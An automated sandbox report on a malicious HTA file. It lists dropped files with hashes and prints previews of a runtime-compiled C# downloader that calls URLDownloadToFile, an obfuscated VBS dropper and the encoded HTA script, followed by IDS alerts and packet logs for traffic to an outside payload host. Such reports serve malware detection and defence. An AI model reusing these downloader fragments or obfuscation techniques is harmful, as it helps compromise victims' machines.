                                                          Preview:L.....Mg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\pdppuoci\CSCAD4A7145578C4D2F8E5E86198ABD60D6.TMP................:g.k..OS....w............4.......C:\Users\user\AppData\Local\Temp\RES6914.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.d.p.p.u.o.c.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ed3y3gwk.0u1.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fykbl5oz.3nf.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivrkptc3.rvv.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nan1tsnm.n5g.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rsi0xc1a.1g5.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zuniayfu.iy4.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\pdppuoci\CSCAD4A7145578C4D2F8E5E86198ABD60D6.TMP

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.0838268301726703
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry6ak7YnqqoPN5Dlq5J:+RI+ycuZhNMakSoPNnqX
                                                          MD5:A53A67BD6B0ED34F53FD9AC90577A42E
                                                          SHA1:80D9A4731E960A9F7AA8CD26B2CA4C93265748DD
                                                          SHA-256:379A50BBD786C828C638A680E14A1C630201C2081C7985234696B3BF3AD70DC0
                                                          SHA-512:E81BA877E2CD8D5E8F6881232BB53E3356B68AD8A00A34496AD76F6E2091F29129224376952C9AF4E81823CCCF319ACE249819419BFBC71E3CA3D513BC696FF1
                                                          Malicious:false
                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.d.p.p.u.o.c.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.d.p.p.u.o.c.i...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                          C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.0.cs

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (355)
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):3.8071536434612825
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuueUe7mMGlfp7QXReKJ8SRHy4Hsf8Xr0J4ubqQmprMIy:V/DTLDfuRmWXfHIu864Iy
                                                          MD5:2506B88F783423EB6A12FAD18A28E4C6
                                                          SHA1:E4B2A9418A3B7D3D3D6F3608F3B094C6CF96A558
                                                          SHA-256:A61DD03E8FD6D96D0F1F793314D5EA799BFA053BA3256C72AC56E75BF8B7228C
                                                          SHA-512:F396FA6AF0740322DCCE95744DD896DC76A62C44F3EDAB04F9D5CDB1F4DBDBB22AAE91EC946ABB73549E37BB166A67318A5ED6F24307B2E77919EBFD6C0A185B
                                                          Malicious:false
                                                          Preview:.using System;.using System.Runtime.InteropServices;..namespace HmPMc.{. public class aAiMzh. {. [DllImport("urLmon.dLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr JQz,string zc,string TWiJmfizG,uint pMjuteK,IntPtr hGIdwfx);.. }..}.

                                                          C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):369
                                                          Entropy (8bit):5.174100570557131
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fTBqzxs7+AEszIwkn23fTBPn:p37Lvkmb6KRf8WZEifZn
                                                          MD5:621420E7F3EADAA038962CC1617DD5AA
                                                          SHA1:710B6EC39F632E00369D4BB29D6A163FF70245F6
                                                          SHA-256:36594EC9BD407A478419C4DC503D6C33B3262544A017346CDB0E379E1BD61658
                                                          SHA-512:CD7F39189A5343559312E66B29729BAB194CDF4569F0F5A057F379CDA0DCB4B7C08917DA5A17004CBF6E2D5E8602193D427CC1219EBF0DBDF3FADB4B1460C4A6
                                                          Malicious:true
                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.0.cs"

                                                          C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.dll

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3072
                                                          Entropy (8bit):2.808753205869415
                                                          Encrypted:false
                                                          SSDEEP:24:etGSKWPBG5eM7p8cM0OkvVG7GX+otkZfmWoCqhkWI+ycuZhNMakSoPNnq:6K9sM+V0rVfYJmWVEH1ulMa3Qq
                                                          MD5:8BA5635A7FF7FB5F70046F7BAC7FCC9E
                                                          SHA1:02B77955E3AEFD6A3BB772E2DE40ADFCADF02F89
                                                          SHA-256:2B7C70C92EC041816418A63EB307475A83B9042748EFD5BDEA190161CBA5E079
                                                          SHA-512:F785CE2612857411BE5966C21DFCEB2198034EA366F7A34AF713887C2E6CF7C7BCB1C4ACC042B0BF93694145C77EC4C6F9D1484EEA9F9EC87E9FEA95D1147BE8
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Mg...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................4.-.....t.....t.......................................... ;.....P ......M.........S.....W.....Z.....d.....l...M.....M...!.M.....M.......!.....*.......;.......................................$..........<Module>.pd

                                                          C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.out

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):867
                                                          Entropy (8bit):5.281123867927371
                                                          Encrypted:false
                                                          SSDEEP:24:KJBqd3ka6KRftEifcKax5DqBVKVrdFAMBJTH:Cika6CtEucK2DcVKdBJj
                                                          MD5:D4C0BD695A5EBC066DC99060DB70CAD3
                                                          SHA1:8D30794327EF4422FF7EF9095912703C32CDAC75
                                                          SHA-256:665FB7292B7F9218D582DAF954E848A4191A59D39497501CCC841134F4539A8E
                                                          SHA-512:FB10AC14305FE5F38E3068D6265C001A0AACA97B191478363EEC85E509C650780B0E0084DA6CA0FD7BD2DDC1FDB655EAA50C179DB2FE0EEF8D21FD0A93474C83
                                                          Malicious:false
                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                          C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (3250), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):153980
                                                          Entropy (8bit):3.8161579842669506
                                                          Encrypted:false
                                                          SSDEEP:3072:MlZ1afy+UshLTPok1alZ1afy+UshLTPokLlZ1afy+UshLTPoks:C+fKsJPBU+fKsJPt+fKsJPI
                                                          MD5:2A35C64DA74E31C6BB2233098EBCAD33
                                                          SHA1:AB084CC1659686A49EB65334623F4845E8FDB9F6
                                                          SHA-256:3C1E1203375F84E0DC74AADD09507C7A0F3ECD5626E6F7D5A917F18246C8F2B9
                                                          SHA-512:399989AD6245A605DD5D435D33A8BFCDCF55B6EB2C159D2944A1168026E555F9A924DC04D2D2E0E6844EF40D212B2A89EA2D30350054B3F4C60A43695B610E35
                                                          Malicious:true
                                                          Preview:...... . . . .....d.W.I.L.W.L.o.W.R.u.A.L.C.x.B. .=. .".z.l.m.k.f.b.W.m.g.u.p.W.h.N.G.".....r.o.T.i.k.l.Z.d.L.W.B.t.G.K.Q. .=. .".a.L.l.e.a.K.k.K.H.c.L.Z.c.c.L.".....f.P.p.x.j.a.N.q.R.H.K.O.t.C.c. .=. .".C.m.g.W.f.P.k.W.R.t.x.g.q.i.s.".........o.c.i.L.N.U.G.z.e.g.K.h.J.P.L. .=. .".G.k.H.h.l.B.K.r.I.c.a.i.b.W.f.".....u.W.i.W.S.L.f.n.l.k.a.i.Z.N.O. .=. .".o.b.I.b.K.J.L.o.L.o.i.N.W.o.i.".....L.B.o.W.f.K.m.W.P.h.c.T.i.c.f. .=. .".G.h.L.K.U.i.u.L.b.n.d.v.a.k.U.".....d.A.i.A.R.R.N.L.Q.L.k.A.m.q.W. .=. .".v.z.b.e.p.U.I.v.c.A.C.b.W.L.t.".....N.a.c.l.R.N.f.u.H.G.x.d.k.U.T. .=. .".j.q.W.G.A.G.L.r.z.l.c.a.j.P.b.".....R.b.d.j.K.c.p.L.z.u.f.q.I.a.U. .=. .".h.P.U.O.e.P.L.h.o.P.h.U.h.n.K.".....T.e.K.a.N.W.S.e.a.d.f.L.q.N.i. .=. .".n.e.v.B.d.m.x.W.O.h.P.L.U.B.B.".....x.m.W.P.A.u.P.f.z.a.a.j.s.U.i. .=. .".p.A.Z.W.h.o.C.L.L.C.L.b.e.I.W.".....K.v.U.C.l.f.e.H.Z.O.s.W.i.n.L. .=. .".z.U.B.o.S.L.G.i.G.k.l.W.i.k.K.".....f.x.l.z.x.L.k.W.G.R.G.W.p.k.C. .=. .".K.c.K.l.u.n.W.W.L.I.G.l.q.Q.B.".....l.x.I.H.o.Z.m.a.

                                                          Static File Info

                                                          General

                                                          File type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                          Entropy (8bit):2.4836204478867345
                                                          TrID:
                                                            File name:seemebestgoodluckthings.hta
                                                            File size:159'541 bytes
                                                            MD5:46792b4c6325dfcc5943fb8912b50bcd
                                                            SHA1:b20380592ee042e7d232d4946e63cb5559cb0eda
                                                            SHA256:18a4b2fda9e31862ce0af8003ed1d5ab843d99f25e9e4fd5fb9f328c5cf0d5e6
                                                            SHA512:005bb4cbcc9c2deb6b0e13e2273f78860da429b76510853e7cba59eaf3afa8f553d32d719fea167edad00bf4694f06a1bc50697719d9952ffa0557292f673199
                                                            SSDEEP:96:4owZw9d6yfazVouAC/sI5UE+aoOun2sGo1mgFVouAC/sI5UE+ao4zun2sGo1mgvT:4LwVgWZGALwYCSQ
                                                            TLSH:02F3FF41A9244065FBFD5E96ACEDB74F35A4221E9EC99D8D4327FB80DCB724BA4408CC
                                                            File Content Preview:<script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253CScript%2520Language%253D%2527Javascript%2527%253E%250A%253C%2521--%2520HTML%2520Encryption%2520provided%2520by%2520tufat.com%2520--%253E%250A%253C%2521--%250Adocument.write%252

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-12-02T09:18:06.576394+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.449732172.245.123.1280TCP
                                                            2024-12-02T09:18:17.834280+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21142.215.209.77443192.168.2.449733TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 2, 2024 09:18:05.293581009 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:05.413616896 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:05.413711071 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:05.413888931 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:05.533833027 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.576272964 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.576297998 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.576309919 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.576394081 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.576507092 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.576533079 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.576545954 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.576575041 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.576581001 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.576591015 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.576626062 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.576855898 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.576868057 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.576879025 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.576905966 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.576927900 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.696420908 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.696522951 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.696624041 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.696675062 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.777446985 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.777574062 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.777688026 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.777744055 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.816498041 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.816590071 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.816685915 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.816762924 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.897497892 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.897650957 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.936619043 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.936666012 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.936683893 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.936696053 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.936709881 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.936726093 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.936738014 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.936742067 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.936753988 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.936767101 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.936772108 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.936784029 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.936800003 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.936810970 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.936820984 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.936840057 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.936857939 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.937175989 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.937187910 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.937196970 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.937208891 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.937215090 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.937227964 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.937253952 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.978800058 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.978878021 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.978883982 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.978928089 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.983042955 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.983098030 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.983110905 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.983135939 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.991441011 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.991513014 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.991535902 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.991578102 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.999846935 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:06.999919891 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:06.999958992 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.000003099 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.017661095 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.017683029 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.017746925 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.057024956 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.057039022 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.057240009 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.060986996 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.061048985 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.061083078 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.061127901 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.069458961 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.069530964 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.069760084 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.069801092 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.077788115 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.077877045 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.077972889 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.078017950 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.085453987 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.085524082 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.085561991 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.085599899 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.093106031 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.093168974 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.093292952 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.093342066 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.100920916 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.100974083 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.101028919 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.101073980 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.108429909 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.108515978 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.108530998 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.108566046 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.116166115 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.116242886 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.116291046 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.116349936 CET4973280192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:07.122975111 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.123039961 CET8049732172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:07.123066902 CET4973280192.168.2.4172.245.123.12
